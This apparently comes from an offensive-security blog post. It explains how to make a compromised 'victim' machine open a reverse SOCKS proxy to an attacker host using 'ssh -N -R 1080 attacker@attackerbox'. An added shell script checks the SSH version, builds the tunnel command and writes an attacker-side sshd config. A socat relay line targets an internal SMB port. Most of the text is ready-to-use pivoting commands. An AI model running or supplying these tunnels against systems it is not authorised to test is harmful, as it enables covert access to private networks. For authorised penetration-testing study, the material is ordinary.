Note: this technique is not good OPSEC (see the end of the post).
If the victim box is running an OpenSSH client version 7.6 or later, you can have it create a reverse SOCKS proxy that listens on your attacker box. The OpenSSH 7.6 release notes describe the feature:
- ssh(1): add support for reverse dynamic forwarding. In this mode,
ssh will act as a SOCKS4/5 proxy and forward connections
to destinations requested by the remote SOCKS client. This mode
is requested using extended syntax for the -R and RemoteForward
options and, because it is implemented solely at the client,
does not require the server be updated to be supported.
ssh -N -R 1080 attacker@attackerbox
With no destination after the port, -R requests reverse dynamic forwarding: sshd on attackerbox listens on port 1080 (bound to loopback only, unless its GatewayPorts option allows otherwise), and every connection you make to that port on the attacker box is handed to the victim's ssh client, which opens it from the victim's side. Point your tools at 127.0.0.1:1080 as a SOCKS proxy and they come out of the victim's network. The -N just keeps the victim from also getting a shell on your box. This is the exact opposite of the -D flag you're probably familiar with, where the SOCKS listener sits on the client side and connections leave through the server.
For this to work you have to use valid creds for your attacker box on the victim machine (a password typed into their ssh client, or a key dropped on their disk), and the command line, with your hostname in it, sits in the victim's process list for as long as the tunnel is up. You could set up a restricted SSH user on your side (remote forwarding only, no shell, no PTY), but you are much better off dropping
socat on their box and binding to a port on their machine. Don't get hacked trying to be cute homie.
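As an added example (not part of the original post), the shell below does the version check the post relies on, builds the victim-side command with the options you actually want on it, and emits a sshd_config Match block that locks down the throwaway account on the attacker box, for anyone who takes the restricted-user route despite the warning. The user name `proxyuser`, the host name `attackerbox` and the `ssh -V` strings are constructed placeholders; `PermitListen` needs an sshd of 7.8 or later on the attacker box.

```shell
#!/bin/sh
# Added example, not from the original post. Names below are placeholders.

# Parse what `ssh -V` prints (e.g. "OpenSSH_7.6p1 Ubuntu-4ubuntu0.3, OpenSSL ...",
# or "OpenSSH_for_Windows_8.1p1, LibreSSL 3.0.2") into "major.minor".
# Prints nothing for a non-OpenSSH client such as Dropbear.
openssh_version() {
    printf '%s\n' "$1" | sed -n \
        's/^OpenSSH_\(for_Windows_\)\{0,1\}\([0-9][0-9]*\)\.\([0-9][0-9]*\).*/\2.\3/p'
}

# Exit 0 if the client supports `-R <port>` reverse dynamic forwarding (>= 7.6).
# Usage on the victim: supports_reverse_dynamic "$(ssh -V 2>&1)"
supports_reverse_dynamic() {
    v=$(openssh_version "$1")
    [ -n "$v" ] || return 1
    major=${v%%.*}
    minor=${v#*.}
    [ "$major" -gt 7 ] || { [ "$major" -eq 7 ] && [ "$minor" -ge 6 ]; }
}

# Victim-side command: $1 = port, $2 = user on attacker box, $3 = attacker host.
# -N: no shell on the attacker box; ExitOnForwardFailure: die instead of
# silently connecting without the listener; keepalive so NAT doesn't drop it.
# The listener is pinned to loopback on the attacker box on purpose.
victim_cmd() {
    printf 'ssh -N -o ExitOnForwardFailure=yes -o ServerAliveInterval=30 -R 127.0.0.1:%s %s@%s\n' \
        "$1" "$2" "$3"
}

# Attacker-side sshd_config Match block for the throwaway account:
# $1 = user, $2 = the one loopback port it may ask sshd to listen on.
# Remote forwarding only, nothing else; ForceCommand kills any shell request.
attacker_sshd_match() {
    cat <<EOF
Match User $1
    AllowTcpForwarding remote
    PermitListen 127.0.0.1:$2
    PermitTTY no
    X11Forwarding no
    AllowAgentForwarding no
    ForceCommand /bin/false
EOF
}

# Example run:
#   supports_reverse_dynamic "$(ssh -V 2>&1)" && victim_cmd 1080 proxyuser attackerbox
#   attacker_sshd_match proxyuser 1080 >> /etc/ssh/sshd_config  (then reload sshd)
```

Even with that Match block, the credential for `proxyuser` still lives on the victim, which is the point of the warning above. The socat alternative the post prefers is a single-target relay (`socat TCP-LISTEN:4444,reuseaddr,fork TCP:internal-host:445` on the victim), not a dynamic SOCKS proxy, so you pick the internal destination up front instead of browsing the network through one listener.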